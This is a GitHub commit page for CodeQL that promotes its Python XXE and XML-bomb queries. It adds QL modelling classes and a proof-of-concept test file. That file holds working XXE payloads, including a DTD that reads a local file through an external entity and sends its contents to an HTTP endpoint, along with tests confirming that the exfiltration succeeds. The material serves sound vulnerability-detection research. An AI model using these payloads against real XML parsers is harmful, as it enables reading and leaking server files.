Skip to content

Commit b6605bc

Browse files
authored
Merge pull request #8634 from RasmusWL/promote-xxe
Python: Promote XXE and XML-bomb queries
2 parents 66ca01a + 4a67891 commit b6605bc

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

64 files changed

+1701
-1091
lines changed

Diff for: docs/codeql/support/reusables/frameworks.rst

+1
Original file line numberDiff line numberDiff line change
@@ -214,3 +214,4 @@ Python built-in support
214214
libtaxii, TAXII utility library
215215
libxml2, XML processing library
216216
lxml, XML processing library
217+
xmltodict, XML processing library

Diff for: python/PoCs/README.md

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
A place to collect proof of concept for how certain vulnerabilities work.

Diff for: python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py renamed to python/PoCs/XmlParsing/PoC.py

+43-6
Original file line numberDiff line numberDiff line change
@@ -70,6 +70,14 @@
7070
<foo>bar</foo>
7171
"""
7272

73+
exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
74+
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
75+
"""
76+
77+
predefined_entity_xml = """<?xml version="1.0"?>
78+
<test>&lt;</test>
79+
"""
80+
7381
# ==============================================================================
7482
# other setup
7583

@@ -95,6 +103,22 @@ def test_xxe():
95103
hit_xxe = True
96104
return "ok"
97105

106+
@app.route("/exfiltrate-through.dtd")
107+
def exfiltrate_through_dtd():
108+
return f"""<!ENTITY % file SYSTEM "file://{FLAG_PATH}">
109+
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://{HOST}:{PORT}/exfiltrate-data?data=%file;'>">
110+
%eval;
111+
%exfiltrate;
112+
"""
113+
114+
exfiltrated_data = None
115+
@app.route("/exfiltrate-data")
116+
def exfiltrate_data():
117+
from flask import request
118+
global exfiltrated_data
119+
exfiltrated_data = request.args["data"]
120+
return "ok"
121+
98122
def run_app():
99123
app.run(host=HOST, port=PORT)
100124

@@ -346,7 +370,7 @@ def test_local_xxe_enabled_by_default():
346370
parser = lxml.etree.XMLParser()
347371
root = lxml.etree.fromstring(local_xxe, parser=parser)
348372
assert root.tag == "test"
349-
assert root.text == "SECRET_FLAG\n", root.text
373+
assert root.text == "SECRET_FLAG", root.text
350374

351375
@staticmethod
352376
def test_local_xxe_disabled():
@@ -361,11 +385,7 @@ def test_remote_xxe_disabled_by_default():
361385
hit_xxe = False
362386

363387
parser = lxml.etree.XMLParser()
364-
try:
365-
root = lxml.etree.fromstring(remote_xxe, parser=parser)
366-
assert False
367-
except lxml.etree.XMLSyntaxError as e:
368-
assert "Failure to process entity remote_xxe" in str(e)
388+
root = lxml.etree.fromstring(remote_xxe, parser=parser)
369389
assert hit_xxe == False
370390

371391
@staticmethod
@@ -416,6 +436,23 @@ def test_dtd_manually_enabled():
416436
pass
417437
assert hit_dtd == False
418438

439+
@staticmethod
440+
def test_exfiltrate_through_dtd():
441+
# note that this only works when the data to exfiltrate does not contain a newline :|
442+
global exfiltrated_data
443+
exfiltrated_data = None
444+
parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
445+
with pytest.raises(lxml.etree.XMLSyntaxError):
446+
lxml.etree.fromstring(exfiltrate_through_dtd_retrieval, parser=parser)
447+
448+
assert exfiltrated_data == "SECRET_FLAG"
449+
450+
@staticmethod
451+
def test_predefined_entity():
452+
parser = lxml.etree.XMLParser(resolve_entities=False)
453+
root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)
454+
assert root.tag == "test"
455+
assert root.text == "<"
419456

420457
# ==============================================================================
421458

Diff for: python/PoCs/XmlParsing/flag

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
SECRET_FLAG
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
---
2+
category: minorAnalysis
3+
---
4+
* Added taint propagation for `io.StringIO` and `io.BytesIO`. This addition was originally [submitted as part of an experimental query by @jorgectf](https://github.com/github/codeql/pull/6112).

Diff for: python/ql/lib/semmle/python/Concepts.qll

+59
Original file line numberDiff line numberDiff line change
@@ -498,6 +498,65 @@ module XML {
498498
abstract string getName();
499499
}
500500
}
501+
502+
/**
503+
* A kind of XML vulnerability.
504+
*
505+
* See overview of kinds at https://pypi.org/project/defusedxml/#python-xml-libraries
506+
*
507+
* See PoC at `python/PoCs/XmlParsing/PoC.py` for some tests of vulnerable XML parsing.
508+
*/
509+
class XmlParsingVulnerabilityKind extends string {
510+
XmlParsingVulnerabilityKind() { this in ["XML bomb", "XXE", "DTD retrieval"] }
511+
512+
/**
513+
* Holds for XML bomb vulnerability kind, such as 'Billion Laughs' and 'Quadratic
514+
* Blowup'.
515+
*
516+
* While a parser could technically be vulnerable to one and not the other, from our
517+
* point of view the interesting part is that it IS vulnerable to these types of
518+
* attacks, and not so much which one specifically works. In practice I haven't seen
519+
* a parser that is vulnerable to one and not the other.
520+
*/
521+
predicate isXmlBomb() { this = "XML bomb" }
522+
523+
/** Holds for XXE vulnerability kind. */
524+
predicate isXxe() { this = "XXE" }
525+
526+
/** Holds for DTD retrieval vulnerability kind. */
527+
predicate isDtdRetrieval() { this = "DTD retrieval" }
528+
}
529+
530+
/**
531+
* A data-flow node that parses XML.
532+
*
533+
* Extend this class to model new APIs. If you want to refine existing API models,
534+
* extend `XmlParsing` instead.
535+
*/
536+
class XmlParsing extends Decoding instanceof XmlParsing::Range {
537+
/**
538+
* Holds if this XML parsing is vulnerable to `kind`.
539+
*/
540+
predicate vulnerableTo(XmlParsingVulnerabilityKind kind) { super.vulnerableTo(kind) }
541+
}
542+
543+
/** Provides classes for modeling XML parsing APIs. */
544+
module XmlParsing {
545+
/**
546+
* A data-flow node that parses XML.
547+
*
548+
* Extend this class to model new APIs. If you want to refine existing API models,
549+
* extend `XmlParsing` instead.
550+
*/
551+
abstract class Range extends Decoding::Range {
552+
/**
553+
* Holds if this XML parsing is vulnerable to `kind`.
554+
*/
555+
abstract predicate vulnerableTo(XmlParsingVulnerabilityKind kind);
556+
557+
override string getFormat() { result = "XML" }
558+
}
559+
}
501560
}
502561

503562
/** Provides classes for modeling LDAP-related APIs. */

Diff for: python/ql/lib/semmle/python/Frameworks.qll

+1
Original file line numberDiff line numberDiff line change
@@ -52,3 +52,4 @@ private import semmle.python.frameworks.Ujson
5252
private import semmle.python.frameworks.Urllib3
5353
private import semmle.python.frameworks.Yaml
5454
private import semmle.python.frameworks.Yarl
55+
private import semmle.python.frameworks.Xmltodict

0 commit comments

Comments
 (0)